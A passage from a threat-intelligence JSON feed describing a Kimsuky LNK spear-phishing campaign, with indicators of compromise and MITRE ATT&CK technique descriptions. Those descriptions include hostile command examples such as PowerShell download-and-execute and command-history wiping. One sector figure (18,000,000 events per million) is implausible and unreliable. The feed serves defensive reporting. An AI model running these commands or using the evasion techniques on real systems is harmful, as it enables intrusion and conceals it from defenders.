"2026-09-12", "nodes": 0.31, "events": 4.14, "sectors": [{"sector": "Unknown", "affected": 2.63, "events": 34.8, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.8, "events": 10.7, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 6.74, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-13", "nodes": 0.23, "events": 3.28, "sectors": [{"sector": "Various", "affected": 1.97, "events": 27.58, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.8, "events": 11.23, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-14", "nodes": 0.62, "events": 7.26, "sectors": [{"sector": "Various", "affected": 5.25, "events": 61.07, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 2.14, "events": 24.87, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-15", "nodes": 0.47, "events": 3.51, "sectors": [{"sector": "Various", "affected": 3.94, "events": 29.55, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.6, "events": 12.04, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-16", "nodes": 0.23, "events": 2.03, "sectors": [{"sector": "Various", "affected": 1.97, "events": 17.07, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.8, "events": 6.95, "total": 1000000}], "countriesTotalDevices": 1000000}]}, {"id": "9f5c8816-50ba-419e-8db4-d4ac9600e78e", "threat_level_id": 2, "description": "Genians Security Center identified 13 malicious LNK file variants collected between August 11-19, 2026, assessed to be part of Kimsuky's Operation GitPower campaign. The LNK files were disguised as financial and corporate documents (fund execution, insurance premiums, policy funds) and distributed via spear phishing emails within ZIP archives. All samples execute PowerShell with abnormally long arguments (5,800-9,500 characters) containing custom-encoded payloads decrypted using a unique arithmetic substitution decoder with the hardcoded variable $VIUSBvejbawf. The malware downloads decoy documents and subsequent PowerShell scripts from GitHub Raw Content using hardcoded Personal Access Tokens (PAT), then establishes persistence via hidden scheduled tasks disguised as legitimate software (BitLocker, MATLAB, .NET). Some variants include anti-analysis routines detecting virtualization tools and sandbox usernames, while one variant uses Pastebin as an alternative C2 channel. Analysis of 29 decoy documents revealed evidence of AI-generated content: PDF metadata recorded the AI coding agent \"opencode\" as Creator/Producer, and documents contained unsubstituted placeholders like \"(temporary value),\" confirming LLM-generated drafts were deployed without verification. The campaign demonstrates Kimsuky's evolution in combining AI-assisted document creation with existing GitHub PAT-based C2 infrastructure.\r\n\r\nThe Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by Genians and shared publicly https://www.genians.co.kr/blog/threat_intelligence/ai-agent-opencode", "kb_article_link": null, "coverage": null, "external_analysis": {"links": ["https://www.genians.co.kr/blog/threat_intelligence/ai-agent-opencode"]}, "is_coat": 0, "name": "Kimsuky Uses AI Agent OpenCode To Craft GitHub PAT Based LNK Attacks", "prevalence": {"countries": [{"iso_code": "US", "affected": 8.83, "events": 130.79, "total": 1000000}, {"iso_code": "TR", "affected": 57.61, "events": 1478.72, "total": 1000000}, {"iso_code": "DE", "affected": 1.56, "events": 4.67, "total": 1000000}, {"iso_code": "IN", "affected": 1.67, "events": 11.66, "total": 1000000}], "events": 63.48, "nodes": 3.83, "sectors": [{"sector": "Unknown", "affected": 26.26, "events": 340.13, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 500000, "events": 18000000, "total": 1000000}, {"sector": "Construction", "affected": 16.26, "events": 195.13, "total": 1000000}, {"sector": "Government", "affected": 1.64, "events": 57.16, "total": 1000000}], "countriesTotalDevices": 1000000}, "iocs": [{"type": "url", "value": "https://pastebin.com/raw/gybpx38s"}, {"type": "url", "value": "https://raw.githubusercontent.com/sven5500/firtfirter/main/"}, {"type": "url", "value": "https://github.com/sven5500"}, {"type": "url", "value": "https://github.com/montry111"}, {"type": "url", "value": "https://github.com/jamjack2026"}, {"type": "url", "value": "https://github.com/urusa4400"}, {"type": "url", "value": "https://github.com/jamestony88"}, {"type": "url", "value": "https://github.com/baras6600P"}, {"type": "url", "value": "https://github.com/choemiyang"}, {"type": "url", "value": "https://github.com/jeni534"}, {"type": "email", "value": "baras6600@proton.me"}, {"type": "email", "value": "choemiyang@hotmail.com"}, {"type": "email", "value": "dustinharrise91@outlook.com"}, {"type": "email", "value": "jackal3300@proton.me"}, {"type": "email", "value": "jametony8@outlook.com"}, {"type": "email", "value": "jamjack2026@proton.me"}, {"type": "email", "value": "montry111@proton.me"}, {"type": "email", "value": "sven5500@proton.me"}, {"type": "email", "value": "taini7700@outlook.com"}, {"type": "email", "value": "urusa4400@proton.m"}, {"type": "md5", "value": "10780939962b54addc9d31f57d80edfc"}, {"type": "sha256", "value": "b4a3401f9953fe28023e6993d53a68de09838a09c722f318f35c9006ef3ca5a1"}, {"type": "sha1", "value": "16726a9bc7a98c728aa5d6f6089c922aabd4de5f"}, {"type": "md5", "value": "1523a2fcc901965ab4568d9fe829e4af"}, {"type": "sha256", "value": "f1bd5817678f498966f033f61b617dee5c8e81191901fea7c4a89146bfe91091"}, {"type": "sha1", "value": "441b709b1a57353a7b127d9a35b5002eee7e6efb"}, {"type": "md5", "value": "500e0bc0d7579fb338912770964076fe"}, {"type": "sha256", "value": "3962777e86602dc73af70b27b894c03bd9bb4c5f985887c2f226ec61a4b863aa"}, {"type": "sha1", "value": "1d24770bd9a291bc3c2f2ebe8353430acf97ad9b"}, {"type": "md5", "value": "685bfc6b2c29fbc16cfad908894add55"}, {"type": "sha256", "value": "23a91475c0e3da3279416bd13995540fe3bf793f239f5b1a7614a62f6673ec19"}, {"type": "sha1", "value": "5dc805aeec6d0db790ce298cd55a751ce129b5b9"}, {"type": "md5", "value": "7a53089053b1381742856a5cf2b95f8b"}, {"type": "sha256", "value": "40bc88ab9e91d10b8d23a2df6158a0a68b367b3325de186e75d4a197d621a9c8"}, {"type": "sha1", "value": "a8e8dde205a7ad45bf85d10be4ed46e2bab00d59"}, {"type": "md5", "value": "8db2f20b719dcb7029d6296505622093"}, {"type": "sha256", "value": "50c8382e99cda7de463ede54f78b4ba05964f3890fe41bb4e8dafa05a3e8e2be"}, {"type": "sha1", "value": "cf37945e460d94aa5d512eb91265a7b188e5fde0"}, {"type": "md5", "value": "900e832c10d851bbdef3fb191a15db0e"}, {"type": "sha256", "value": "8d0aad27440fb29f9ab5f1af0f7977ed332d945d4bbeb7af0a96e07ac24eaaff"}, {"type": "sha1", "value": "f72bd8bde005b8646d64f6a516407b6f9d2c680a"}, {"type": "md5", "value": "a2015665a3e18bf0ef86e3931245c7e6"}, {"type": "sha256", "value": "7d3d860489387f3722ac08fec8eb990aa8dcfdcefbc96489f9404dd016e16a96"}, {"type": "sha1", "value": "7638e92a438613f29a0bda9a848d0043decc5016"}, {"type": "md5", "value": "bb88940e915b11f6330b7446f6037f5b"}, {"type": "sha256", "value": "1a88cb87d0242a6f3383295057d938098c10461e92ea015bc649a5a67f243c79"}, {"type": "sha1", "value": "693d6dac7afa49d1a9d07ef0c6184ebb3a9998e7"}, {"type": "md5", "value": "ce5932b88f879f26006df81f2fa7667e"}, {"type": "sha256", "value": "852cce9bc86aaa36c9ceaf16517dfb07a46246f7c047ed8305b1278444f72837"}, {"type": "sha1", "value": "3d4867e2c63e62b5102ccba44920ccef79c619e4"}, {"type": "md5", "value": "d0894d4626aae0f96d6b84ca3bb71a36"}, {"type": "sha256", "value": "fa0150d7fc744aa88529a798ee4e54519c3bdac7bfd45f59eb00092548560e2a"}, {"type": "sha1", "value": "43e3fa124c67b6448ffcbc073419e949eeff44dc"}, {"type": "md5", "value": "e50f2ae7fb03675a1ef58b1cf9cda6d1"}, {"type": "sha1", "value": "c8cb836b3f67d0cae6fdeff4d90410ce9355a97e"}, {"type": "sha256", "value": "b9f7133bddc4145b0dc9ddabe22cdebd6caed9ec5281728b6eeb67781a283a8b"}, {"type": "md5", "value": "f648bdd3c2cd902e239149de86d43e8f"}, {"type": "sha256", "value": "352915ff6862e551a5a3b64339f36784d8365967168f02f439e0f9626324947c"}, {"type": "sha1", "value": "8f9885fff4685eba3d5072f57a9c8bed3337c186"}], "galaxies": [{"id": "87df7cd8-a378-4c40-a671-3cfd1307cab8", "category": "mitre-attack-pattern", "description": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) \n\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1656), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\n", "created_on": "2024-06-27T21:12:25.000Z", "name": "Artificial Intelligence"}, {"id": "a26e83e0-a46b-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-06-02T00:54:38.000Z", "name": "Bank"}, {"id": "bebe798e-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Bidirectional Communication"}, {"id": "cf1a222f-665e-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>.  \n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.(Citation: Broadcom ESXi Shell Audit)\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)", "created_on": "2021-02-03T20:31:35.000Z", "name": "Clear Command History"}, {"id": "9ed61b06-f7e8-4482-a309-bb1a9e695522", "category": "mitre-attack-pattern", "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)\n\nIn some instances, artifacts of persistence may also be removed once an adversary\u2019s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)", "created_on": "2023-03-17T05:12:10.000Z", "name": "Clear Persistence"}, {"id": "d7febade-310d-4258-8191-a5d6417ff46e", "category": "trellix-tool", "description": "Console Windows Host (conhost.exe) is a legitimate Microsoft Windows file and used for Command Prompt to interface with File Explorer.", "created_on": "2023-09-21T05:13:07.000Z", "name": "Console Windows Host"}, {"id": "c3dcf574-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> or <code>type</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Deobfuscate/Decode Files or Information"}, {"id": "aeddd759-fd26-4ad5-9a59-356196e62972", "category": "mitre-attack-pattern", "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.", "created_on": "2024-05-23T21:13:59.000Z", "name": "Encrypted/Encoded File"}, {"id": "c4976d05-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", "created_on": "2020-02-26T13:49:11.000Z", "name": "Exfiltration Over C2 Channel"}, {"id": "ea767971-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows, <code>rm</code> or <code>unlink</code> on Linux and macOS, and `rm` on ESXi.", "created_on": "2020-11-20T22:08:27.000Z", "name": "File Deletion"}, {"id": "4532b1ca-6916-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:44:55.000Z", "name": "Finance"}, {"id": "d0851fae-277f-4f6d-88d1-ebd08fd7bd37", "category": "trellix-tool", "description": "The PowerShell Get-Process cmdlet retrieves data on active processes for local or remote computers, functioning like a more advanced version of the Windows Task Manager Processes tab by enabling detailed data manipulation via filtering and piping.", "created_on": "2026-05-07T00:11:14.000Z", "name": "Get-Process"}, {"id": "a8ab0689-973a-427d-92cc-90bc1fc8118f", "category": "trellix-tool", "description": "GitHub is a web-based platform used for version control and collaboration on software development projects. It provides tools for developers to host and review code, manage projects, track changes, and collaborate with other team members or contributors. GitHub uses Git, a distributed version control system, allowing developers to track changes made to code over time, revert to previous versions if needed, and work on code collaboratively with others. It is widely used by individuals, open-source projects, and businesses to streamline software development processes and facilitate collaboration among developers worldwide.", "created_on": "2024-04-03T21:15:07.000Z", "name": "GitHub"}, {"id": "3aa35890-3683-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls \u2013a</code> for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdditionally, adversaries may name files in a manner that would allow the file to be hidden such as naming a file only a \u201cspace\u201d character.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", "created_on": "2020-12-04T22:51:21.000Z", "name": "Hidden Files and Directories"}, {"id": "fd41c17c-b505-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", "created_on": "2020-06-23T03:59:51.000Z", "name": "Indirect Command Execution"}, {"id": "c4685e8c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "created_on": "2020-02-26T13:49:11.000Z", "name": "Ingress Tool Transfer"}, {"id": "486e7429-9c82-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-22T23:16:36.000Z", "name": "Insurance"}, {"id": "c5996a6a-7e35-4a8a-9d0a-929faf2ffb7a", "category": "trellix-tool", "description": "The Invoke-Expression cmdlet executes a provided string as a command, returning the output of the evaluated expression or command. In the absence of Invoke-Expression, a string entered at the command line is simply echoed back without interpretation or execution.", "created_on": "2022-05-19T21:16:55.000Z", "name": "Invoke-Expression"}, {"id": "ff3fff83-67e5-11eb-9477-02d538d9640e", "category": "trellix-threat-actor", "description": "The Kimsuky APT group has been in operation since at least 2012 and uses a range of initial infection vectors including social engineering tactics, spear-phishing, and watering hole attacks. The threat actor targets subject matter experts, think tanks, and government entities around the world with a focus on gathering data related to foreign policy and national security issues. Kimsuky uses various tools during attacks including a modified version of TeamViewer, Win7Elevate to inject malicious code, keyloggers, PowerShell scripts, and a Google Chrome extension to steal passwords and cookies from the browser.", "created_on": "2021-02-05T19:11:49.000Z", "name": "Kimsuky"}, {"id": "bce5e493-305c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, .reg, and .iso.(Citation: Mandiant Trojanized Windows 10)\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) \n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).", "created_on": "2020-11-27T03:00:42.000Z", "name": "Malicious File"}, {"id": "bce1ab72-305c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).", "created_on": "2020-11-27T03:00:42.000Z", "name": "Malicious Link"}, {"id": "beab4bcf-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)", "created_on": "2020-12-03T03:00:48.000Z", "name": "Masquerade Task or Service"}, {"id": "294bbdf8-4134-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.", "created_on": "2020-12-18T13:23:05.000Z", "name": "Match Legitimate Name or Location"}, {"id": "42174b22-12f9-4f94-995d-66e45f6829e1", "category": "mitre-attack-pattern", "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", "created_on": "2021-07-23T16:55:51.000Z", "name": "NTFS File Attributes"}, {"id": "e6481958-b676-4c9a-84ea-d38f6bfaff7d", "category": "trellix-tool", "description": "OpenCode operates as an open-source, model-agnostic AI coding agent designed to run directly on a user's computer, where it can manage files, execute terminal commands, and automate software workflows without being tied to a single proprietary AI architecture.", "created_on": "2026-09-09T16:11:30.000Z", "name": "OpenCode"}, {"id": "03a54b3d-aa21-11eb-9477-02d538d9640e", "category": "trellix-tool", "description": "Microsoft's powershell scripting language is available by default from Windows 7 upwards and therefore provides stealth with that environment for launching attacks. Further, powershell has been made open-source and cross-platform with the advent of 'powershell core' in 2016.\r\n\r\nPowerShell provides full access to all Windows services including Microsoft COM (Component Object Model) and Microsoft Windows Management Instrumentation (WMI), while add-ins can easily be imported to include functionality for managing Active Directory, Exchange, etc.\r\n\r\nSome other features that make powershell an interesting choice for attackers include:\r\n - Ability to run code directly in memory with ease\r\n - Flexibility to encode elements of a script in a multitude of ways\r\n - Full access to the Microsoft .Net framework\r\n - Ability to re-create the powershell framework binary using .Net framework dll's.\r\n - Logging and detecting behavior is difficult in older versions\r\n - Availability of a number of quality attack frameworks written in powershell.\r\n\r\nSource: Microsoft", "created_on": "2021-05-01T02:00:33.000Z", "name": "PowerShell"}, {"id": "e95190b8-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL 